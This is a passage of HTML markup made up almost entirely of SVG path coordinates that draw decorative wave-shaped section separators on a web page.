1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.8